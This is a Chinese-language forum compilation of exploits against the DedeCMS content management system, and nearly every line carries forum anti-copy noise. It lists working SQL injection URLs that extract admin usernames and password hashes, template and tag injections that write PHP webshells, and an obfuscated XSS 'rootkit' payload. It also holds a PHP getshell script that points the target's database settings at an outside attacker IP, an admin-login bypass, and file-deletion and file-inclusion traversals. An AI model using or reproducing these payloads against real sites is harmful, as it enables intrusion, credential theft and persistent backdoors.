|
|
9 [/ g9 K( S" @( n2 T5 M% Z
Dedecms 5.6 rss注入漏洞1 W: K8 _$ z$ E H$ G% Z
http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=1
- m( F( I* _$ e% G, H
$ j! I. q3 S/ \
& ^7 O, O6 ~/ Q g! ]* [4 u1 v- L( p; o0 O
, Q0 {4 O: {" \: Z) i% }" H
4 Z; X9 e, q' }/ I& S2 y
2 e1 V% g7 O- t5 a: e" @2 J) t6 p8 q9 Y% ^7 d
! C3 k7 q: F- R, I( i% @. jDedeCms v5.6 嵌入恶意代码执行漏洞
* V) U$ G( j- C注册会员,上传软件:本地地址中填入 a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}
& F. b# G1 T5 ^1 ~3 r) J发表后查看或修改即可执行* d0 R- A# a! W0 Q
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}% ~6 g n: e; R! w, W
生成x.php 密码xiao,直接生成一句话。
: D4 S6 W* G* K' F f8 b2 t+ A E( T9 c/ J# [2 p5 e6 {7 u. d
/ w$ d! N- }6 z
: i7 H$ g% X- N7 S! G6 O) j( }4 ~' V
. j$ b4 h$ T1 x& W$ U% P5 P; F* ?: s) \* T0 D$ u6 j
+ O- _% @- V0 U9 y8 q1 W/ N9 j8 l' Z' D6 q
Dede 5.6 GBK SQL注入漏洞
, t4 q, r7 j8 D bhttp://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';6 |. m% J5 W/ Y6 {+ A! Y7 T6 G
http://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe# D' L8 ?; u) o8 j; z% P
http://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7! ~+ b" G9 F7 v, G& I" _& h
" H4 x# R" ~* j; H ?3 \* y& g
# p( t( L G% L1 I% N5 ^
# k0 J9 A7 V* H: o/ ~4 U8 r5 i
6 q2 ]8 ?' O' s( g
* I( v: o5 Y; [+ M+ U9 ]
B! W7 ^5 j) C% d" Z. D4 n/ X# {, T/ v: j+ J9 O& ^$ s' k2 g; {5 D
5 X2 E' S( K j7 ~6 U
DedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞
. g2 o( h( e- s- Q1 U+ j; Xhttp://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin` : L; ?& \! O" J$ P
* [/ k3 f/ Q/ x: T9 C; p
) R* D; _" w% ~% R" C% D {5 d# v6 s- b6 d4 F
. R o& L0 [% }; Q4 U8 Z/ U! w, m+ a: \- h- g
& R1 B) H, {1 {9 @+ a6 w- u7 MDEDECMS 全版本 gotopage变量XSS漏洞
; D& h% f, J$ G5 p1.复制粘贴下面的URL访问,触发XSS安装XSS ROOTKIT,注意IE8/9等会拦截URL类型的XSS漏洞,需关闭XSS筛选器。 9 Q+ {! Q$ W! c8 |+ l# _
http://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="
& @( L( [4 ?" K% E& |
# S1 z+ k: _9 E4 N$ @0 K5 B' l0 q0 F8 a- J* b
2.关闭浏览器,无论怎么访问下面的任意URL,都会触发我们的XSS。 3 N7 `/ @# `! f+ a4 H, d0 z! s- ]
http://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda7 o1 J$ m) U0 {1 e1 W7 i X' ?& G/ A
$ j5 T! x! s: W j$ @: L
# J( @2 D5 m* Khttp://v57.demo.dedecms.com/dede/login.php
* ~- K# i3 k; a+ z; _
1 p( i! T) d5 v' a# w8 D9 K
( g8 E- b( g4 x7 Y; ocolor=Red]DeDeCMS(织梦)变量覆盖getshell
( R% {) ?5 o% `# H, A% h#!usr/bin/php -w- M1 k& ?( ?; p
<?php$ Z" d$ p* v8 u# _
error_reporting(E_ERROR);" I4 L( {3 B- z
set_time_limit(0);$ N# k$ h. s: r4 X# R- h: u; v; P
print_r('
c; c" l( d! @- `) bDEDEcms Variable Coverage
3 A+ L+ g5 p! d7 @. XExploit Author: www.heixiaozi.comwww.webvul.com4 E2 h7 n! M( N/ ^0 ]
);' z2 F+ N" N8 _# l
echo "\r\n";
+ R) F* F i5 s6 e, R J7 V+ \1 fif($argv[2]==null){/ G" O2 W" [2 ^$ y/ Z+ K3 w' [& D, E
print_r('7 \" G0 }6 ~; l7 r. E
+---------------------------------------------------------------------------+- n7 ?% j) W% P a; b ^
Usage: php '.$argv[0].' url aid path; O7 j* M! b/ `# A' s9 t+ ^
aid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/
1 I& M4 X* q1 t0 DExample:/ J- w9 i- P5 c( U% c
php '.$argv[0].' www.site.com 1 old
m4 q8 r. E( _; C; }5 b+---------------------------------------------------------------------------+
3 Q2 }# s( s. r3 S$ |1 C' G');; G) G( Y, F9 N% T: v+ T. G
exit;
" z9 J- \* i9 X! ]}
( t( G5 m% b# f" y. l$url=$argv[1];
* P) g; k4 x) X$aid=$argv[2];
+ h. h) X0 y8 `, a1 F$path=$argv[3];
" E7 s$ N: y" n# i1 b$exp=Getshell($url,$aid,$path);
+ e& l g$ L, U: e* u fif (strpos($exp,"OK")>12){
4 E. m3 E5 G! C6 Vecho "/ N$ ?! D y! r/ @+ I
Exploit Success \n";
3 h. ] q5 g% v( R6 R& qif($aid==1)echo "3 f/ _1 F" t: G# C, r) r% g
Shell:".$url."/$path/data/cache/fuck.php\n" ;
: J- h; ^# ]" U4 s5 }2 {7 D8 Q8 |/ t
: q( W7 _- l r) K. S, E# q+ F( G
if($aid==2)echo "
# t" `: P: _4 |/ U& sShell:".$url."/$path/fuck.php\n" ;* n8 g9 p$ y7 ~- Y3 H
) A* h! T3 J# ? P; \- i, q2 n. B, Z: \; b: R5 P6 ~
if($aid==3)echo "' A! ?& j/ ^5 v6 n1 d! |, f$ w4 Q
Shell:".$url."/$path/plus/fuck.php\n";4 H" f# _; a& E* s( M- ?4 K- ?7 V
3 Q6 v# Q" a" j- G7 j# @) r5 B; R3 \+ O5 S
, d/ y, O5 V: I: Z) Y$ }}else{
. }) c* [. a& r; k& W# ~echo "
+ {2 [# @7 i& J; mExploit Failed \n";
M' ^2 Q7 U* u' q2 m3 s7 N! v}
/ ?+ w$ h; e# T @2 l. nfunction Getshell($url,$aid,$path){0 u) E% n4 X$ G! T5 x
$id=$aid;: G( e5 T/ d& V$ D$ W/ D+ ?$ z
$host=$url;9 K# I4 K3 a9 w
$port="80"; m& g6 Y& }$ x) X2 v
$content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";
$ B; u& q: k* \ w+ r# {' i$data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";- d. t3 _; j& G/ O$ t
$data .= "Host: ".$host."\r\n";, _, b0 b1 w3 b) Q$ M& [
$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
- A) {! A' x' B$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";# R0 I' f4 a$ u5 t- g
$data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";+ M% p0 Z# h1 _8 Y' Y F
//$data .= "Accept-Encoding: gzip,deflate\r\n";& k8 P9 c" U2 ]
$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";7 R4 y; _! x" h- L
$data .= "Connection: keep-alive\r\n";. R- J6 Y! {4 ]4 r8 M
$data .= "Content-Type: application/x-www-form-urlencoded\r\n";
| l& R& H0 E) Q$ j$data .= "Content-Length: ".strlen($content)."\r\n\r\n";% y2 P9 n/ P+ I' i
$data .= $content."\r\n";
' w$ y' w/ z$ U6 e$ock=fsockopen($host,$port);
/ q& {" U+ v6 h+ t1 j2 Yif (!$ock) {
% U$ P2 L: Z- b Hecho "
* t/ ]% t0 U% T, ?- d- U, `No response from ".$host."\n";
R6 o d) l+ }4 B}2 v' u/ n2 m+ |3 w& @. X& t
fwrite($ock,$data);0 R) N- q9 X% D- k5 D
while (!feof($ock)) {
( A4 |9 b7 }, F* t* E7 x$exp=fgets($ock, 1024);. t* d3 L4 j2 ~0 U* c
return $exp;
h" a& ?/ E" {! t% @}
8 j$ k/ e+ E5 z% Q8 T}
# E+ i1 c6 x/ }
, Y( d# \- z! \6 k- p& I" F' g% j( f. @' x; g/ s, |; t
?>- \2 i7 W: u6 v$ Q; `
+ }5 N6 f) l+ a+ d
; S" U8 S) A+ Q1 C3 b+ x
- P% ]! {5 U0 Q; Y. P+ |4 m
# L+ u* f% x7 e1 W' ?$ a4 n/ N1 D4 ~0 `4 u- X% _2 Z, g
/ k$ a. n: h$ h0 f/ B
/ F: k8 p: y8 o% B, Q5 H7 T. d* N+ ?1 U9 n1 ~
7 H0 W( m3 G& `" t: Z$ N$ _- W
& Y* n4 Q0 q9 O0 M% O
DedeCms v5.6-5.7 越权访问漏洞(直接进入后台)4 R) W( Y$ J6 B' L
http://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root
/ ?( m% ?3 ]7 P0 c6 s* T, c y
x! u, ?% b: z! c
3 }. o5 T2 L# x; o/ I z把上面validate=dcug改为当前的验证码,即可直接进入网站后台
0 p) v1 H' ?, s# p; D F, B% Q+ M
1 q6 _+ f2 J6 m# |, i5 o& ?9 w- F
此漏洞的前提是必须得到后台路径才能实现
- [$ h; a" |- `' {+ E4 s3 y
) `) c4 U2 U: I& l: [' \
% l, z. n0 U. F* C5 I; s& c- C- ^/ V$ ]! `# ~$ |7 N$ y
( J( L$ I, i% Y; O: n" {
. l( I" T$ R( b9 C/ g! z
" W6 G6 v! M9 @+ F# g: o% F: E1 l! N# p; S6 |
$ T9 y& E. G! h
* ?- [6 r0 q+ Q5 z) N" h5 L1 i
/ A3 c& ^ m3 N7 t- j+ F0 ^Dedecms织梦 标签远程文件写入漏洞
9 X0 Y/ {2 F1 j& A) C前题条件,必须准备好自己的dede数据库,然后插入数据: insert into dede_mytag(aid,normbody) values(1,''{dede:php}$fp = @fopen("1.php", \''a\'');@fwrite($fp, \''\'');echo "OK";@fclose($fp);{/dede:php}'');
5 N$ K+ M7 k3 N5 [+ b' ? E- {
3 B. U4 \6 }0 o, o3 R$ ~6 @5 i. X, b
再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。
- @ L; W# B# @- V" I, G% p6 I<form action="" method="post" name="QuickSearch" id="QuickSearch">/ b+ w4 I) |) u/ j8 y/ e6 H
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
1 d7 }4 k9 g( G& Z5 _0 G" [8 Q, \5 E+ G<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
) |- i! {; F4 \1 @. j6 E# k& ?; ~<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
, [- x5 e, s+ E+ W% y/ y<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />0 T2 q: s4 T7 k( K8 Y
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
f7 f/ M% x( I( E) p& ]3 L<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />! c: ^- X8 K" B! A7 w% B
<input type="text" value="true" name="nocache" style="width:400">5 z. C+ {. T2 O0 r
<input type="submit" value="提交" name="QuickSearchBtn"><br />
$ |3 N9 j8 S3 L</form>7 c$ D' j$ N8 w8 O
<script>
: D# y! [* A3 J, }! u1 o- Ufunction addaction()9 X% f0 X8 C' g9 Y
{! W Y9 \4 ]7 [1 I. o, A
document.QuickSearch.action=document.QuickSearch.doaction.value;
* f5 C0 p( }1 `" z; D a}% r1 l! C _% m
</script>4 u) r% l9 w- a# K: V" W8 ?2 H1 g
* }, a6 `/ _, o
: l: l9 h. z0 P$ O& Q) z# K8 k/ M X2 Y0 ?4 v2 r3 I8 U% D
" e; k$ O- C% E9 s7 z& O2 t$ J0 Y0 {% D$ k6 L9 Z- y/ u9 Y
7 y$ W: D/ t( q8 x5 C" H
+ }1 G# K2 j! w& H, {, ?% v& |* Y9 A1 F. D7 ~* L6 j% v
9 B/ J5 C8 O$ m7 l
" r+ o6 A6 n$ W3 z$ i+ rDedeCms v5.6 嵌入恶意代码执行漏洞
; W$ v$ `1 U7 `) V7 o6 e注册会员,上传软件:本地地址中填入a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57},发表后查看或修改即可执行5 l8 v M3 V, ~
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
2 D5 U, V; e+ x6 x0 t" p8 V" U4 L生成x.php 密码:xiao直接生成一句话。密码xiao 大家懂得7 s5 }/ ?, h5 w% A; p' J
Dedecms <= V5.6 Final模板执行漏洞
- V# u: ^+ ]8 z4 L$ @* K& ~" J注册一个用户,进入用户管理后台,发表一篇文章,上传一个图片,然后在附件管理里,把图片替换为我们精心构造的模板,比如图片名称是:
) e8 i' l9 D5 r! M6 S7 Ouploads/userup/2/12OMX04-15A.jpg
3 c" P2 f8 M7 D* u+ ]$ G1 [
* x- x; ~1 e1 G, Y; S
7 |9 j+ F" t$ N( l! f& _) b模板内容是(如果限制图片格式,加gif89a):" I9 X5 [$ ~5 I0 S6 \0 c7 b: H
{dede:name runphp='yes'}. B2 Y+ _$ U/ ~" d$ G5 M$ O
$fp = @fopen("1.php", 'a');! H4 }$ F- F' a3 d) w2 L( y
@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");
H7 ]9 w$ @8 C) h6 ?@fclose($fp);; }6 j) H/ ?* |+ l
{/dede:name}
% z8 C* q+ ~8 Q& J9 T2 修改刚刚发表的文章,查看源文件,构造一个表单:
5 `; r5 U( [0 W<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">
, y" I9 Z$ A3 i, t; U: W: F<input type="hidden" name="dopost" value="save" />( D& s0 h2 T" A6 T
<input type="hidden" name="aid" value="2" />6 H; ] K" S+ G/ v# I0 p
<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />
0 o1 E* Z$ D0 p- L. y<input type="hidden" name="channelid" value="1" />
+ Y+ R8 s6 {3 I' l+ D: U4 x<input type="hidden" name="oldlitpic" value="" />" ]0 Q! n9 w- R6 ~6 O, ^+ ?1 T
<input type="hidden" name="sortrank" value="1275972263" />4 c: P5 D7 G+ J2 J% j. w
/ u4 M. T, \9 _" p ]
% \! ]$ [) [+ J4 H9 g) I1 z<div id="mainCp">- M- n1 L* H5 D, @
<h3 class="meTitle"><strong>修改文章</strong></h3>' h/ l. W0 F' |( q% m* q
( O, P% e, k) X0 v9 A
5 X/ T3 G4 d p6 q% f8 R! E& r<div class="postForm">- B! ]9 E4 U( g1 }
<label>标题:</label>
6 B2 e! p- R+ I<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>
" E& k, a, \& U/ Z
" ?+ q: [! K0 p' h+ k y
7 B" L: Q7 T' d6 o5 T5 p8 t" a) l<label>标签TAG:</label> H! {8 Z# s2 ]3 \5 C
<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(用逗号分开)
! H$ F, s0 y# R5 z9 J6 _
+ t9 F4 r$ ?6 D) }" ]5 j3 s
) l; K( @- V2 ^. C% w( O<label>作者:</label>! @+ x# f. G$ Y$ ]6 P2 u
<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>$ B' b( ~/ l) |& }" M6 ^2 }
/ [ e0 x, Z, E1 G# n2 a! R9 H; ]) a( p
<label>隶属栏目:</label>
; z) l: {# P7 D4 |, v; B<select name='typeid' size='1'>- Z% M8 |: e2 h$ |- t [
<option value='1' class='option3' selected=''>测试栏目</option>
" C) ?$ N1 c1 z5 Z% g6 b5 _% K</select> <span style="color:#F00">*</span>(不能选择带颜色的分类)
2 N$ b/ @% @" w
; M% f0 ~1 c5 ?6 A2 K5 v. K6 z1 Q2 I, t% T3 j
<label>我的分类:</label>' Z3 n( T5 v7 T, U
<select name='mtypesid' size='1'>' s2 M% ^, W# M0 \. M+ Q7 e( D
<option value='0' selected>请选择分类...</option>
2 @. D" M5 e" N7 B<option value='1' class='option3' selected>hahahha</option>
7 {6 Y7 ?6 A- f- Q/ S4 v, J</select>
( W! j5 x: v7 {4 `7 W7 G/ \& E8 z0 S" u0 J3 ]# J
; X4 `, w) ^* x6 t. b8 w0 E4 T<label>信息摘要:</label>
% p0 d1 @. h5 o3 L<textarea name="description" id="description">1111111</textarea>9 I: K C& s. Y! l& S; M
(内容的简要说明)( T2 p0 x0 R+ ?( E* d, o* N0 y6 I+ N
1 K& `" Q' v, A& L' \0 } \
4 K8 ?& F7 ~6 A3 ^+ l/ {4 j<label>缩略图:</label>6 ~) y/ f$ X$ k T) ^. ~
<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>
5 n/ ^0 Q% O. t. J3 v, N5 y% n% \& G: t! f8 a! |( T
: h) d0 y8 L0 l! ^; D5 j
<input type='text' name='templet'% H; X+ ]( t+ [* z! o
value="../ uploads/userup/2/12OMX04-15A.jpg">
1 a9 ~+ h0 H5 a- }0 m<input type='text' name='dede_addonfields'! R8 |& l+ ]! s4 f& z
value="templet,htmltext;">(这里构造)
3 [! P- O- { |, g& }0 s! G9 H</div>
& ~* T |4 Y! d, x
3 ]- P. Z! [& s- E& }" W) {% S8 ]' r
<!-- 表单操作区域 -->
5 |. a" n9 W: J9 G1 [<h3 class="meTitle">详细内容</h3>
8 G9 c l3 @+ n) c3 G( @* L. Y( h4 F- Z0 g; o) D
2 d! r% [$ Q1 z<div class="contentShow postForm">- {- A5 N( J, c2 r- M( O: r6 d+ _# p
<input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>
/ }. k9 K S# `, j) q' y1 c: n" Y$ \5 }+ _6 G4 }9 u
! V/ l9 z# F1 c4 W<label>验证码:</label>" E- a' i- x: o+ ^- E' S
<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />
9 H+ }: F3 {7 j) x<img src="http://127.0.0.1 /dede/include/vdimgck.php" alt="看不清?点击更换" align="absmiddle" style="cursor:pointer" />/ ]6 e$ V& C; a& Z R8 x8 b) V0 |, j
i5 L$ b4 o, H- A7 X: g
' b9 ?$ X/ q9 x. d5 D<button class="button2" type="submit">提交</button>
( y, r8 g2 Q% v. O# i) }<button class="button2 ml10" type="reset">重置</button>
# ^& f+ }( I, ^2 L9 {* `- b</div>; n5 |/ H' y8 X3 K p7 t
7 }: P5 [, e F7 ^$ `* e5 |. x4 h2 l3 M6 D6 _, Z+ C
</div>0 w6 b7 |! b' |( e6 ^5 d6 O
D" l, j' ^3 M# @+ I
, G0 b1 C4 l$ \: v. v; _
</form>; ^* k5 y5 m7 C1 A6 r* U
, A6 A5 G# t0 p. d8 h
- |2 h' T2 K7 }( p
提交,提示修改成功,则我们已经成功修改模板路径。 3 访问修改的文章:$ Z4 ]* j8 |1 J! a/ e- f
假设刚刚修改的文章的aid为2,则我们只需要访问:
5 C* }7 i2 j. \0 n9 Hhttp://127.0.0.1/dede/plus/view.php?aid=2) x, j' }5 V9 m: D: Z
即可以在plus目录下生成webshell:1.php
. v5 U, S q7 w' b& J5 K2 t9 P- q5 |) ]
) k* \7 X( y' ?! F5 o5 o8 J; _) X
1 d" f6 N: x9 e0 Q- A
) |. M8 Z& d' ]- f0 {% g
% f* e$ M8 x: i# t5 _$ Y2 N n6 K6 J8 }9 r3 F
$ X' e/ t0 F7 f2 H: v4 Q) K" P: R4 l, \
0 U; I2 H" U! P0 P* n1 p% C2 z' P
. |$ J. v# }1 l3 E' k- j: g
1 I- t3 R/ U4 {# b( _% L
4 i9 } ?" q, s; _% l% a- v7 bDEDECMS网站管理系统Get Shell漏洞(5.3/5.6)
# s% w, j6 Z+ u" u6 V* @Gif89a{dede:field name='toby57' runphp='yes'}& G5 Z. Z9 F: F K6 A% u- U4 E
phpinfo();
! Z: _# N! n/ [7 H{/dede:field}9 ^- {9 J$ P1 b" J1 F; c; C# C
保存为1.gif8 ^" h) c/ P3 |0 t6 D
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data" ">
( {" T! H! `; R: V3 }/ u' c: p<input type="hidden" name="aid" value="7" />
3 ^7 J% W* R9 {) i<input type="hidden" name="mediatype" value="1" /> 0 z8 z0 `0 A# z- ^$ h+ P1 ]
<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /></br>
# |) z) O" h5 V' U7 u# l<input type="hidden" name="dopost" value="save" />
$ i% Q: J( h: o% H2 w& q) H<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/> 6 F: N( _( R2 A5 c# }
<input name="addonfile" type="file" id="addonfile"/>
' P# ?: X/ \. }) c5 K3 u<button class="button2" type="submit" >更改</button> ) _! `: X' C8 }# r
</form> % k( O: e' k5 d4 I/ r' `
1 N3 c" Y, f' ^% w0 H0 I
+ q, L0 \9 \- t9 x构造如上表单,上传后图片保存为/uploads/userup/3/1.gif& c( |& V6 P( i; o* f9 @
发表文章,然后构造修改表单如下:
" N( P! L; `! \3 C9 t' e: t" T0 |5 h& J" A
! O" _' }. W7 z
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data"> , v' Z( D. y' K: D6 E6 a3 o9 r
<input type="hidden" name="dopost" value="save" /> 6 \- ]8 _/ E2 c0 j9 O' t# G9 R x
<input type="hidden" name="aid" value="2" /> / q5 V Q0 i. ? x
<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" /> + m& U; a+ ^: E( {1 \1 @+ g6 i# X! w
<input type="hidden" name="channelid" value="1" /> 4 A8 k& J- _6 z- ~/ R9 i/ x' K
<input type="hidden" name="oldlitpic" value="" /> ) X, L# t- q6 \/ p
<input type="hidden" name="sortrank" value="1282049150" />
/ U) h" N+ d" s4 R<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/>
1 [5 K7 ]$ m& |/ R( l$ a, e. G<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/> 3 X4 Q2 t% g! K9 _/ K
<select name='typeid' size='1'>
3 r& E w* i. `( z( T B<option value='1' class='option3' selected=''>Test</option>
& D1 t: q9 O2 z8 F. i7 K9 I( {6 s<select name='mtypesid' size='1'>
0 u. c& F q, H5 d) E4 g4 x" z4 Y* G7 `& {<option value='0' selected>请选择分类...</option> 4 k0 X. k6 q1 K& j
<option value='1' class='option3' selected>aa</option></select>
' z% ]3 U/ G1 K/ Z<textarea name="description" id="description">aaaaaaaaaaaaa</textarea> 4 e* p- `! T. K3 c- J+ x* g
<input type='hidden' name='dede_addonfields' value="templet"> : c$ k0 p3 X; k
<input type='hidden' name='templet' value="../uploads/userup/3/1.gif"> ; z- ^8 |, {! s! m( s( ] x
<input type="hidden" id="body" name="body" value="aaaa" style="display:none" /> + K( j! p" @4 R
<button class="button2" type="submit">提交</button> 5 i3 b8 z8 W& x% q
</form>2 ~8 E6 g+ i' |0 c. e ?% x4 a
3 e) G4 o8 q/ S; V! J- k. H
9 X6 R6 C* n$ s- d8 K2 c: S! e: e8 K1 y' _! r
) S; R; \6 X* G2 t y
7 F, S% Y5 d; j4 M
' _) {( w2 M% G/ T! @
& J3 u0 |# e0 `5 Q# k$ X+ y3 O( D. |, _1 `" j' v- ~, Y$ X
5 r. O" u2 b3 Z; D2 M
$ r$ [) \* U& ? i/ @' ?
% N) P: ]' x! R& P0 k( Z1 c* f4 z, u
织梦(Dedecms)V5.6 远程文件删除漏洞
Z8 J" |% b: e8 ?; @4 p; [http://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif
# W4 ~1 s8 w0 o# G2 O
! g' v1 d d; B) u4 R
I# V$ A; Y1 w) [7 V% b h6 K ]1 N% O& e1 R$ m
/ h' z( Q! w* E8 |# N( O$ a1 J
" W. K$ X) @2 Y: K* e) b
, {& i0 S: F/ F6 Y, G$ b; U
U9 {9 B" \& j5 l; Z+ e, [
1 G- ?8 O: [. i6 ]/ X; C1 _. S
3 n5 W! |& ^$ x! Q9 ~- `' ^3 I: j6 M/ i0 }, K8 p% R5 n
织梦(Dedecms) V5.6 plus/carbuyaction.php 本地文件包含漏洞 ) h6 d9 H5 O% {# |* Q' e, F
http://www.test.com/plus/carbuya ... urn&code=../../
1 Z$ I6 u U! G! |" c ]
0 j# _( {) w6 t! k! q% W6 j2 T. w! {& @ {, _. [
# u0 H9 o0 o5 _ F- S. Q- @; ]
4 Q2 ]! x9 u" Y+ }7 w, y7 I& n8 v0 v; h: q5 N
9 @, v: G( P" m
" n9 u1 ]& Q% s9 [
! M& s8 Z0 i, X
3 R' f1 g1 J# U( Y. C4 e( g* n3 T9 t8 B' S- u& Z1 M
DedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞 5 S6 G" ~* ?$ G: a k2 l
plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`; c6 _ F2 b# D L3 l& [7 U
密码是32位MD5减去头5位,减去尾七位,得到20 MD5密码,方法是,前减3后减1,得到16位MD5
. P$ E9 s* l5 u' @. E& S u. l+ {+ P5 M) G# q, f4 d) Z% S
( @9 R/ L, j, @) \' J& g2 @
- c4 H2 _: t( @, a0 J y6 G' G- U' k) X
% u( q/ {0 a/ {( A& T, r$ j9 C2 h+ p* ]7 m! ]
2 z* r; z9 q: G/ a! e, D
, o) I& @2 ]5 [% e$ c G/ {, V
$ ], Y! F" O3 I# l2 L1 O* N- T+ O, h& X4 }- L6 U) z! g
织梦(Dedecms) 5.1 feedback_js.php 注入漏洞5 }3 H: B: c7 b" z
http://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='* m1 b1 N! H/ @, i3 h
+ s5 H1 v, @# R+ X; o+ E! H# w2 c! \5 b
4 U8 ^8 A1 N+ y. a6 T
9 ?! F# a; Q) F$ A
; R# y2 i0 V! a9 I9 z' V+ T5 f; b- v+ B+ ]# m6 t
7 E7 I0 F6 @" K3 K' S e5 M7 S
' s |- H( q- y0 {7 F9 B/ ]1 P5 n% r( J9 k" i# i- l: f4 [( U
